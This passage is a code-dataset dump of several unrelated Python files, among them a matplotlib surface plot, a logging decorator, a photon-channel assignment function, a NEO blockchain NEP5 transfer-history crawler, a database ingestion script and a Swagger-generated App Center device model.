interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(_contract_address, _amount, {\"from\": account})\n tx.wait(1)\n print(\"Fund contract!\")\n return 
tx\n","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"621897045","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\n\nfig = plt.figure()\nax = Axes3D(fig)\n\np = np.linspace(0, 2*math.pi, num=10)\nq = np.linspace(0, 2*math.pi, num=10)\nx = np.cos(p)*np.cos(q)\ny = np.sin(p)*np.cos(q)\nx, y = np.meshgrid(x, y)\nz = np.sin(q)\n\nax.plot_surface(x, y, z, rstride=1, cstride=1, cmap='rainbow')\n\nplt.show()","sub_path":"drawtest/matplotlib/Axes3D_surface.py","file_name":"Axes3D_surface.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"60318083","text":"import logging\nfrom functools import wraps\n\n\ndef is_continue():\n temp = input('Do you want to continue? ').lower()\n return temp in ['yes', 'y']\n\n\ndef log(func):\n @wraps(func)\n def timed(*args, **kw):\n logger = logging.getLogger(func.__name__)\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler('{}.log'.format(func.__name__))\n fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n formatter = logging.Formatter(fmt)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n for item in args:\n logger.debug('arg - {}'.format(item))\n result = func(*args, **kw)\n logger.info(' result - {}'.format(result))\n return result\n\n return timed\n\n\ndef get_params(value):\n result = ''.join(value)\n result = result.split(',')\n return result\n","sub_path":"Task4_File_Parser/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"580491275","text":"def photon_number_to_channels(photons, filter_afterpulsing=True):\n \"\"\"\n Given a stream of photons, assign each photon to a channel which indicates\n the numer of photons which arrived after a given pulse of excitation, and\n the order in which those photon arrived. By default, each channel may\n only produce a single photon per pulse, but this behavior may be\n suppressed by setting filter_afterpulsing to False.\n \"\"\"\n def emit_queue(queue):\n n_photons = len(queue)\n channel = n_photons*(n_photons-1)//2\n for photon in queue:\n photon.channel = channel\n yield(photon)\n channel += 1\n\n queue = list()\n \n for photon in photons:\n if len(queue) == 0:\n queue.append(photon)\n elif photon.pulse == queue[0].pulse:\n if filter_afterpulsing and \\\n any(map(lambda other: photon.channel == other.channel, queue)):\n # Ignore any subsequent photon on a given channel, as these\n # are more likely to be afterpulsing than true events\n continue\n else:\n queue.append(photon)\n else:\n for result in emit_queue(queue):\n yield(result)\n\n queue.clear()\n queue.append(photon) \n","sub_path":"photon_correlation_examples/photon_number_to_channels.py","file_name":"photon_number_to_channels.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"155177497","text":"#! 
/usr/bin/env python3\n# coding: utf-8\n# flow@蓝鲸淘\n# Licensed under the MIT License.\n\nimport sys\nimport math\nimport uvloop\nimport asyncio\nimport aiohttp\nimport datetime\nimport binascii\nimport hashlib\nfrom base58 import b58encode\nimport motor.motor_asyncio\nfrom logzero import logger\nfrom decimal import Decimal as D\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nfrom Config import Config as C\nfrom CommonTool import CommonTool as CT\n\n\nclass Crawler:\n def __init__(self, mongo_uri, mongo_db, neo_uri, loop, tasks='1000'):\n self.client = motor.motor_asyncio.AsyncIOMotorClient(mongo_uri)\n self.state = self.client[mongo_db].state\n self.nep5history = self.client[mongo_db].nep5history\n self.max_tasks = int(tasks)\n self.neo_uri = neo_uri\n self.processing = []\n self.cache = {}\n self.cache_log = {}\n self.cache_decimals = {}\n conn = aiohttp.TCPConnector(limit=10000)\n self.session = aiohttp.ClientSession(loop=loop,connector=conn)\n self.net = C.get_net()\n self.super_node_uri = C.get_super_node()\n\n def hex_to_num_str(self, fixed8_str, decimals=8):\n hex_str = CT.big_or_little(fixed8_str)\n if not hex_str: return '0'\n d = D(int('0x' + hex_str, 16))\n return CT.sci_to_str(str(d/D(math.pow(10, decimals))))\n\n @staticmethod\n def hash256(b):\n return hashlib.sha256(hashlib.sha256(b).digest()).digest()\n\n @classmethod\n def scripthash_to_address(cls, sh):\n tmp = binascii.unhexlify('17' + sh)\n result = b58encode(tmp + cls.hash256(tmp)[:4])\n if isinstance(result, bytes): result = result.decode('utf8')\n return result\n\n async def get_invokefunction(self, contract, func):\n async with self.session.post(self.neo_uri,\n json={'jsonrpc':'2.0','method':'invokefunction','params':[contract, func],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to get invokefunction')\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_decimals(self, contract):\n d = await self.get_invokefunction(contract, 'decimals')\n if 'state' in d.keys() and d['state'].startswith('HALT') and d['stack'][0]['value']:\n return int(d['stack'][0]['value'])\n return 8\n\n async def get_cache_decimals(self, contract):\n if contract not in self.cache_decimals.keys():\n self.cache_decimals[contract] = await self.get_decimals(contract)\n return self.cache_decimals[contract]\n\n async def get_block(self, height):\n async with self.session.post(self.neo_uri, json={'jsonrpc':'2.0','method':'getblock','params':[height,1],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to fetch block {}'.format(height))\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_block_count(self):\n async with self.session.post(self.neo_uri,\n json={'jsonrpc':'2.0','method':'getblockcount','params':[],'id':1}) as resp:\n if 200 != resp.status:\n logger.error('Unable to fetch blockcount')\n sys.exit(1)\n j = await resp.json()\n return j['result']\n\n async def get_history_state(self):\n start = -1\n if 'mainnet' == self.net: start = 1444800\n if 'testnet' == self.net: start = 442400\n result = await self.state.find_one({'_id':'nep5history'})\n if not result:\n await self.state.insert_one({'_id':'nep5history','value':start})\n return start\n else:\n return result['value']\n\n async def update_history_state(self, height):\n await self.state.update_one({'_id':'nep5history'}, {'$set': {'value':height}}, upsert=True)\n\n async def cache_block(self, height):\n self.cache[height] = await self.get_block(height)\n\n async def cache_applicationlog(self, txid):\n url 
= self.super_node_uri + '/' + self.net + '/log/' + txid\n async with self.session.get(url, timeout=120) as resp:\n if 200 != resp.status:\n logger.error('Visit %s get status %s' % (url, resp.status))\n return None\n j = await resp.json()\n if 'error' in j.keys():\n logger.error('Visit %s return error %s' % (url, j['error']))\n return None\n self.cache_log[txid] = j\n\n async def update_a_vin(self, asset, txid, index, address, value, utc_time):\n _id = txid + str(index) + '_in_'\n try:\n await self.nep5history.update_one({'_id':_id},\n {'$set':{\n 'txid':txid,\n 'time':utc_time,\n 'address':address,\n 'asset':asset,\n 'value':value,\n 'operation':'out'\n }},upsert=True)\n except Exception as e:\n logger.error('Unable to update a vin %s:%s' % (_id,e))\n sys.exit(1)\n\n async def update_a_vout(self, asset, txid, index, address, value, utc_time):\n _id = txid + str(index) + '_out_'\n try:\n await self.nep5history.update_one({'_id':_id},\n {'$set':{\n 'txid':txid,\n 'time':utc_time,\n 'address':address,\n 'asset':asset,\n 'value':value,\n 'operation':'in'\n }},upsert=True)\n except Exception as e:\n logger.error('Unable to update a vout %s:%s' % (_id,e))\n sys.exit(1)\n\n def timestamp_to_utc(self, timestamp):\n return datetime.datetime.utcfromtimestamp(timestamp)\n\n async def crawl(self):\n self.start = await self.get_history_state()\n self.start += 1\n\n while True:\n current_height = await self.get_block_count()\n time_a = CT.now()\n if self.start < current_height:\n stop = self.start + self.max_tasks\n if stop >= current_height:\n stop = current_height\n self.processing.extend([i for i in range(self.start,stop)])\n max_height = max(self.processing)\n min_height = self.processing[0]\n await asyncio.wait([self.cache_block(h) for h in self.processing])\n if self.processing != sorted(self.cache.keys()):\n msg = 'cache != processing'\n logger.error(msg)\n sys.exit(1)\n txids = [] \n for block in self.cache.values():\n for tx in block['tx']:\n if 'InvocationTransaction' == tx['type']:\n txids.append(tx['txid'])\n if txids:\n await asyncio.wait([self.cache_applicationlog(txid) for txid in txids])\n if sorted(txids) != sorted(self.cache_log.keys()):\n msg = 'cache log error'\n logger.error(msg)\n sys.exit(1)\n\n #await asyncio.wait([self.add_nep5_history(log) for log in self.cache.values()])\n vins = [] #froms\n vouts = [] #tos\n for block in self.cache.values():\n block_time = block['time']\n for tx in block['tx']:\n txid = tx['txid']\n if 'InvocationTransaction' == tx['type']:\n log = self.cache_log[txid]\n if 'HALT, BREAK' == log['vmstate']:\n for i in range(len(log['notifications'])):\n n = log['notifications'][i]\n asset = n['contract'][2:]\n if 'value' in n['state'].keys() and \\\n isinstance(n['state']['value'],list) and \\\n 4 == len(n['state']['value']) and \\\n '7472616e73666572' == n['state']['value'][0]['value']:\n value = self.hex_to_num_str(n['state']['value'][3]['value'], decimals=await self.get_cache_decimals(asset))\n from_sh = n['state']['value'][1]['value']\n if from_sh:\n from_address = self.scripthash_to_address(from_sh)\n vins.append([asset, txid, i, from_address, value, block_time])\n to_sh = n['state']['value'][2]['value']\n to_address = self.scripthash_to_address(to_sh)\n vouts.append([asset, txid, i, to_address, value, block_time])\n \n if vins:\n await asyncio.wait([self.update_a_vin(*vin) for vin in vins])\n if vouts:\n await asyncio.wait([self.update_a_vout(*vout) for vout in vouts])\n\n time_b = CT.now()\n logger.info('reached %s ,cost %.6fs to sync %s blocks ,total 
cost: %.6fs' % \n (max_height, time_b-time_a, stop-self.start, time_b-START_TIME))\n await self.update_history_state(max_height)\n self.start = max_height + 1\n del self.processing\n del self.cache\n del self.cache_log\n self.processing = []\n self.cache = {}\n self.cache_log = {}\n else:\n await asyncio.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n START_TIME = CT.now()\n logger.info('STARTING...')\n mongo_uri = C.get_mongo_uri()\n neo_uri = C.get_neo_uri()\n mongo_db = C.get_mongo_db()\n tasks = C.get_tasks()\n loop = asyncio.get_event_loop()\n crawler = Crawler(mongo_uri, mongo_db, neo_uri, loop, tasks)\n loop.run_until_complete(crawler.crawl())\n '''\n try:\n loop.run_until_complete(crawler.crawl())\n except Exception as e:\n logger.error('LOOP EXCEPTION: %s' % e)\n finally:\n loop.close()\n '''\n","sub_path":"src/nep5history.py","file_name":"nep5history.py","file_ext":"py","file_size_in_byte":10444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"143373310","text":"import os\nfrom configparser import ConfigParser\nfrom utils.database import db\nfrom services.sqlIngest import DataHandler\n\n\nif __name__ == '__main__':\n config = ConfigParser()\n settings_file = os.path.join(os.getcwd(), 'settings.cfg')\n config.read(settings_file)\n\n db.config(config['Database'])\n loader = DataHandler(config)\n ingestion = config['Ingestion']\n\n years = [int(year) for year in ingestion['YEARS'].split(',')]\n limit = int(ingestion['LIMIT'])\n querySize = int(ingestion['QUERY_SIZE'])\n\n querySize = min([limit, querySize])\n\n loader.populateDatabase(years, limit, querySize)\n","sub_path":"server/src/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"448172111","text":"# coding: utf-8\n\n\"\"\"\n App Center Client\n\n Microsoft Visual Studio App Center API # noqa: E501\n\n OpenAPI spec version: preview\n Contact: benedetto.abbenanti@gmail.com\n Project Repository: https://github.com/b3nab/appcenter-sdks\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass LogFlowDevice(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'sdk_name': 'string',\n 'sdk_version': 'string',\n 'wrapper_sdk_version': 'string',\n 'wrapper_sdk_name': 'string',\n 'model': 'string',\n 'oem_name': 'string',\n 'os_name': 'string',\n 'os_version': 'string',\n 'os_build': 'string',\n 'os_api_level': 'integer',\n 'locale': 'string',\n 'time_zone_offset': 'integer',\n 'screen_size': 'string',\n 'app_version': 'string',\n 'carrier_name': 'string',\n 'carrier_code': 'string',\n 'carrier_country': 'string',\n 'app_build': 'string',\n 'app_namespace': 'string',\n 'live_update_release_label': 'string',\n 'live_update_deployment_key': 'string',\n 'live_update_package_hash': 'string',\n 'wrapper_runtime_version': 'string'\n }\n\n attribute_map = {\n 'sdk_name': 'sdk_name',\n 'sdk_version': 'sdk_version',\n 'wrapper_sdk_version': 'wrapper_sdk_version',\n 'wrapper_sdk_name': 'wrapper_sdk_name',\n 'model': 'model',\n 'oem_name': 'oem_name',\n 'os_name': 'os_name',\n 'os_version': 'os_version',\n 'os_build': 'os_build',\n 
'os_api_level': 'os_api_level',\n 'locale': 'locale',\n 'time_zone_offset': 'time_zone_offset',\n 'screen_size': 'screen_size',\n 'app_version': 'app_version',\n 'carrier_name': 'carrier_name',\n 'carrier_code': 'carrier_code',\n 'carrier_country': 'carrier_country',\n 'app_build': 'app_build',\n 'app_namespace': 'app_namespace',\n 'live_update_release_label': 'live_update_release_label',\n 'live_update_deployment_key': 'live_update_deployment_key',\n 'live_update_package_hash': 'live_update_package_hash',\n 'wrapper_runtime_version': 'wrapper_runtime_version'\n }\n\n def __init__(self, sdk_name=None, sdk_version=None, wrapper_sdk_version=None, wrapper_sdk_name=None, model=None, oem_name=None, os_name=None, os_version=None, os_build=None, os_api_level=None, locale=None, time_zone_offset=None, screen_size=None, app_version=None, carrier_name=None, carrier_code=None, carrier_country=None, app_build=None, app_namespace=None, live_update_release_label=None, live_update_deployment_key=None, live_update_package_hash=None, wrapper_runtime_version=None): # noqa: E501\n \"\"\"LogFlowDevice - a model defined in Swagger\"\"\" # noqa: E501\n self._sdk_name = None\n self._sdk_version = None\n self._wrapper_sdk_version = None\n self._wrapper_sdk_name = None\n self._model = None\n self._oem_name = None\n self._os_name = None\n self._os_version = None\n self._os_build = None\n self._os_api_level = None\n self._locale = None\n self._time_zone_offset = None\n self._screen_size = None\n self._app_version = None\n self._carrier_name = None\n self._carrier_code = None\n self._carrier_country = None\n self._app_build = None\n self._app_namespace = None\n self._live_update_release_label = None\n self._live_update_deployment_key = None\n self._live_update_package_hash = None\n self._wrapper_runtime_version = None\n self.discriminator = None\n self.sdk_name = sdk_name\n self.sdk_version = sdk_version\n if wrapper_sdk_version is not None:\n self.wrapper_sdk_version = wrapper_sdk_version\n if wrapper_sdk_name is not None:\n self.wrapper_sdk_name = wrapper_sdk_name\n if model is not None:\n self.model = model\n if oem_name is not None:\n self.oem_name = oem_name\n self.os_name = os_name\n self.os_version = os_version\n if os_build is not None:\n self.os_build = os_build\n if os_api_level is not None:\n self.os_api_level = os_api_level\n self.locale = locale\n self.time_zone_offset = time_zone_offset\n if screen_size is not None:\n self.screen_size = screen_size\n self.app_version = app_version\n if carrier_name is not None:\n self.carrier_name = carrier_name\n if carrier_code is not None:\n self.carrier_code = carrier_code\n if carrier_country is not None:\n self.carrier_country = carrier_country\n self.app_build = app_build\n if app_namespace is not None:\n self.app_namespace = app_namespace\n if live_update_release_label is not None:\n self.live_update_release_label = live_update_release_label\n if live_update_deployment_key is not None:\n self.live_update_deployment_key = live_update_deployment_key\n if live_update_package_hash is not None:\n self.live_update_package_hash = live_update_package_hash\n if wrapper_runtime_version is not None:\n self.wrapper_runtime_version = wrapper_runtime_version\n\n @property\n def sdk_name(self):\n \"\"\"Gets the sdk_name of this LogFlowDevice. # noqa: E501\n\n Name of the SDK. Consists of the name of the SDK and the platform, e.g. \"appcenter.ios\", \"hockeysdk.android\".\n # noqa: E501\n\n :return: The sdk_name of this LogFlowDevice. 
# noqa: E501\n :rtype: string\n \"\"\"\n return self._sdk_name\n\n @sdk_name.setter\n def sdk_name(self, sdk_name):\n \"\"\"Sets the sdk_name of this LogFlowDevice.\n\n Name of the SDK. Consists of the name of the SDK and the platform, e.g. \"appcenter.ios\", \"hockeysdk.android\".\n # noqa: E501\n\n :param sdk_name: The sdk_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if sdk_name is None:\n raise ValueError(\"Invalid value for `sdk_name`, must not be `None`\") # noqa: E501\n\n self._sdk_name = sdk_name\n\n @property\n def sdk_version(self):\n \"\"\"Gets the sdk_version of this LogFlowDevice. # noqa: E501\n\n Version of the SDK in semver format, e.g. \"1.2.0\" or \"0.12.3-alpha.1\".\n # noqa: E501\n\n :return: The sdk_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._sdk_version\n\n @sdk_version.setter\n def sdk_version(self, sdk_version):\n \"\"\"Sets the sdk_version of this LogFlowDevice.\n\n Version of the SDK in semver format, e.g. \"1.2.0\" or \"0.12.3-alpha.1\".\n # noqa: E501\n\n :param sdk_version: The sdk_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if sdk_version is None:\n raise ValueError(\"Invalid value for `sdk_version`, must not be `None`\") # noqa: E501\n\n self._sdk_version = sdk_version\n\n @property\n def wrapper_sdk_version(self):\n \"\"\"Gets the wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n\n Version of the wrapper SDK in semver format. When the SDK is embedding another base SDK (for example Xamarin.Android wraps Android), the Xamarin specific version is populated into this field while sdkVersion refers to the original Android SDK.\n # noqa: E501\n\n :return: The wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_sdk_version\n\n @wrapper_sdk_version.setter\n def wrapper_sdk_version(self, wrapper_sdk_version):\n \"\"\"Sets the wrapper_sdk_version of this LogFlowDevice.\n\n Version of the wrapper SDK in semver format. When the SDK is embedding another base SDK (for example Xamarin.Android wraps Android), the Xamarin specific version is populated into this field while sdkVersion refers to the original Android SDK.\n # noqa: E501\n\n :param wrapper_sdk_version: The wrapper_sdk_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_sdk_version = wrapper_sdk_version\n\n @property\n def wrapper_sdk_name(self):\n \"\"\"Gets the wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n\n Name of the wrapper SDK. Consists of the name of the SDK and the wrapper platform, e.g. \"appcenter.xamarin\", \"hockeysdk.cordova\".\n # noqa: E501\n\n :return: The wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_sdk_name\n\n @wrapper_sdk_name.setter\n def wrapper_sdk_name(self, wrapper_sdk_name):\n \"\"\"Sets the wrapper_sdk_name of this LogFlowDevice.\n\n Name of the wrapper SDK. Consists of the name of the SDK and the wrapper platform, e.g. \"appcenter.xamarin\", \"hockeysdk.cordova\".\n # noqa: E501\n\n :param wrapper_sdk_name: The wrapper_sdk_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_sdk_name = wrapper_sdk_name\n\n @property\n def model(self):\n \"\"\"Gets the model of this LogFlowDevice. # noqa: E501\n\n Device model (example: iPad2,3).\n # noqa: E501\n\n :return: The model of this LogFlowDevice. 
# noqa: E501\n :rtype: string\n \"\"\"\n return self._model\n\n @model.setter\n def model(self, model):\n \"\"\"Sets the model of this LogFlowDevice.\n\n Device model (example: iPad2,3).\n # noqa: E501\n\n :param model: The model of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._model = model\n\n @property\n def oem_name(self):\n \"\"\"Gets the oem_name of this LogFlowDevice. # noqa: E501\n\n Device manufacturer (example: HTC).\n # noqa: E501\n\n :return: The oem_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._oem_name\n\n @oem_name.setter\n def oem_name(self, oem_name):\n \"\"\"Sets the oem_name of this LogFlowDevice.\n\n Device manufacturer (example: HTC).\n # noqa: E501\n\n :param oem_name: The oem_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._oem_name = oem_name\n\n @property\n def os_name(self):\n \"\"\"Gets the os_name of this LogFlowDevice. # noqa: E501\n\n OS name (example: iOS). The following OS names are standardized (non-exclusive): Android, iOS, macOS, tvOS, Windows.\n # noqa: E501\n\n :return: The os_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_name\n\n @os_name.setter\n def os_name(self, os_name):\n \"\"\"Sets the os_name of this LogFlowDevice.\n\n OS name (example: iOS). The following OS names are standardized (non-exclusive): Android, iOS, macOS, tvOS, Windows.\n # noqa: E501\n\n :param os_name: The os_name of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if os_name is None:\n raise ValueError(\"Invalid value for `os_name`, must not be `None`\") # noqa: E501\n\n self._os_name = os_name\n\n @property\n def os_version(self):\n \"\"\"Gets the os_version of this LogFlowDevice. # noqa: E501\n\n OS version (example: 9.3.0).\n # noqa: E501\n\n :return: The os_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_version\n\n @os_version.setter\n def os_version(self, os_version):\n \"\"\"Sets the os_version of this LogFlowDevice.\n\n OS version (example: 9.3.0).\n # noqa: E501\n\n :param os_version: The os_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if os_version is None:\n raise ValueError(\"Invalid value for `os_version`, must not be `None`\") # noqa: E501\n\n self._os_version = os_version\n\n @property\n def os_build(self):\n \"\"\"Gets the os_build of this LogFlowDevice. # noqa: E501\n\n OS build code (example: LMY47X).\n # noqa: E501\n\n :return: The os_build of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._os_build\n\n @os_build.setter\n def os_build(self, os_build):\n \"\"\"Sets the os_build of this LogFlowDevice.\n\n OS build code (example: LMY47X).\n # noqa: E501\n\n :param os_build: The os_build of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._os_build = os_build\n\n @property\n def os_api_level(self):\n \"\"\"Gets the os_api_level of this LogFlowDevice. # noqa: E501\n\n API level when applicable like in Android (example: 15).\n # noqa: E501\n\n :return: The os_api_level of this LogFlowDevice. # noqa: E501\n :rtype: integer\n \"\"\"\n return self._os_api_level\n\n @os_api_level.setter\n def os_api_level(self, os_api_level):\n \"\"\"Sets the os_api_level of this LogFlowDevice.\n\n API level when applicable like in Android (example: 15).\n # noqa: E501\n\n :param os_api_level: The os_api_level of this LogFlowDevice. 
# noqa: E501\n :type: integer\n \"\"\"\n\n self._os_api_level = os_api_level\n\n @property\n def locale(self):\n \"\"\"Gets the locale of this LogFlowDevice. # noqa: E501\n\n Language code (example: en_US).\n # noqa: E501\n\n :return: The locale of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._locale\n\n @locale.setter\n def locale(self, locale):\n \"\"\"Sets the locale of this LogFlowDevice.\n\n Language code (example: en_US).\n # noqa: E501\n\n :param locale: The locale of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if locale is None:\n raise ValueError(\"Invalid value for `locale`, must not be `None`\") # noqa: E501\n\n self._locale = locale\n\n @property\n def time_zone_offset(self):\n \"\"\"Gets the time_zone_offset of this LogFlowDevice. # noqa: E501\n\n The offset in minutes from UTC for the device time zone, including daylight savings time.\n # noqa: E501\n\n :return: The time_zone_offset of this LogFlowDevice. # noqa: E501\n :rtype: integer\n \"\"\"\n return self._time_zone_offset\n\n @time_zone_offset.setter\n def time_zone_offset(self, time_zone_offset):\n \"\"\"Sets the time_zone_offset of this LogFlowDevice.\n\n The offset in minutes from UTC for the device time zone, including daylight savings time.\n # noqa: E501\n\n :param time_zone_offset: The time_zone_offset of this LogFlowDevice. # noqa: E501\n :type: integer\n \"\"\"\n if time_zone_offset is None:\n raise ValueError(\"Invalid value for `time_zone_offset`, must not be `None`\") # noqa: E501\n\n self._time_zone_offset = time_zone_offset\n\n @property\n def screen_size(self):\n \"\"\"Gets the screen_size of this LogFlowDevice. # noqa: E501\n\n Screen size of the device in pixels (example: 640x480).\n # noqa: E501\n\n :return: The screen_size of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._screen_size\n\n @screen_size.setter\n def screen_size(self, screen_size):\n \"\"\"Sets the screen_size of this LogFlowDevice.\n\n Screen size of the device in pixels (example: 640x480).\n # noqa: E501\n\n :param screen_size: The screen_size of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._screen_size = screen_size\n\n @property\n def app_version(self):\n \"\"\"Gets the app_version of this LogFlowDevice. # noqa: E501\n\n Application version name, e.g. 1.1.0\n # noqa: E501\n\n :return: The app_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_version\n\n @app_version.setter\n def app_version(self, app_version):\n \"\"\"Sets the app_version of this LogFlowDevice.\n\n Application version name, e.g. 1.1.0\n # noqa: E501\n\n :param app_version: The app_version of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if app_version is None:\n raise ValueError(\"Invalid value for `app_version`, must not be `None`\") # noqa: E501\n\n self._app_version = app_version\n\n @property\n def carrier_name(self):\n \"\"\"Gets the carrier_name of this LogFlowDevice. # noqa: E501\n\n Carrier name (for mobile devices).\n # noqa: E501\n\n :return: The carrier_name of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_name\n\n @carrier_name.setter\n def carrier_name(self, carrier_name):\n \"\"\"Sets the carrier_name of this LogFlowDevice.\n\n Carrier name (for mobile devices).\n # noqa: E501\n\n :param carrier_name: The carrier_name of this LogFlowDevice. 
# noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_name = carrier_name\n\n @property\n def carrier_code(self):\n \"\"\"Gets the carrier_code of this LogFlowDevice. # noqa: E501\n\n Carrier country code (for mobile devices).\n # noqa: E501\n\n :return: The carrier_code of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_code\n\n @carrier_code.setter\n def carrier_code(self, carrier_code):\n \"\"\"Sets the carrier_code of this LogFlowDevice.\n\n Carrier country code (for mobile devices).\n # noqa: E501\n\n :param carrier_code: The carrier_code of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_code = carrier_code\n\n @property\n def carrier_country(self):\n \"\"\"Gets the carrier_country of this LogFlowDevice. # noqa: E501\n\n Carrier country.\n # noqa: E501\n\n :return: The carrier_country of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._carrier_country\n\n @carrier_country.setter\n def carrier_country(self, carrier_country):\n \"\"\"Sets the carrier_country of this LogFlowDevice.\n\n Carrier country.\n # noqa: E501\n\n :param carrier_country: The carrier_country of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._carrier_country = carrier_country\n\n @property\n def app_build(self):\n \"\"\"Gets the app_build of this LogFlowDevice. # noqa: E501\n\n The app's build number, e.g. 42.\n # noqa: E501\n\n :return: The app_build of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_build\n\n @app_build.setter\n def app_build(self, app_build):\n \"\"\"Sets the app_build of this LogFlowDevice.\n\n The app's build number, e.g. 42.\n # noqa: E501\n\n :param app_build: The app_build of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n if app_build is None:\n raise ValueError(\"Invalid value for `app_build`, must not be `None`\") # noqa: E501\n\n self._app_build = app_build\n\n @property\n def app_namespace(self):\n \"\"\"Gets the app_namespace of this LogFlowDevice. # noqa: E501\n\n The bundle identifier, package identifier, or namespace, depending on what the individual platforms use, e.g. com.microsoft.example.\n # noqa: E501\n\n :return: The app_namespace of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._app_namespace\n\n @app_namespace.setter\n def app_namespace(self, app_namespace):\n \"\"\"Sets the app_namespace of this LogFlowDevice.\n\n The bundle identifier, package identifier, or namespace, depending on what the individual platforms use, e.g. com.microsoft.example.\n # noqa: E501\n\n :param app_namespace: The app_namespace of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._app_namespace = app_namespace\n\n @property\n def live_update_release_label(self):\n \"\"\"Gets the live_update_release_label of this LogFlowDevice. # noqa: E501\n\n Label that is used to identify application code 'version' released via Live Update beacon running on device\n # noqa: E501\n\n :return: The live_update_release_label of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_release_label\n\n @live_update_release_label.setter\n def live_update_release_label(self, live_update_release_label):\n \"\"\"Sets the live_update_release_label of this LogFlowDevice.\n\n Label that is used to identify application code 'version' released via Live Update beacon running on device\n # noqa: E501\n\n :param live_update_release_label: The live_update_release_label of this LogFlowDevice. 
# noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_release_label = live_update_release_label\n\n @property\n def live_update_deployment_key(self):\n \"\"\"Gets the live_update_deployment_key of this LogFlowDevice. # noqa: E501\n\n Identifier of environment that current application release belongs to, deployment key then maps to environment like Production, Staging.\n # noqa: E501\n\n :return: The live_update_deployment_key of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_deployment_key\n\n @live_update_deployment_key.setter\n def live_update_deployment_key(self, live_update_deployment_key):\n \"\"\"Sets the live_update_deployment_key of this LogFlowDevice.\n\n Identifier of environment that current application release belongs to, deployment key then maps to environment like Production, Staging.\n # noqa: E501\n\n :param live_update_deployment_key: The live_update_deployment_key of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_deployment_key = live_update_deployment_key\n\n @property\n def live_update_package_hash(self):\n \"\"\"Gets the live_update_package_hash of this LogFlowDevice. # noqa: E501\n\n Hash of all files (ReactNative or Cordova) deployed to device via LiveUpdate beacon. Helps identify the Release version on device or need to download updates in future.\n # noqa: 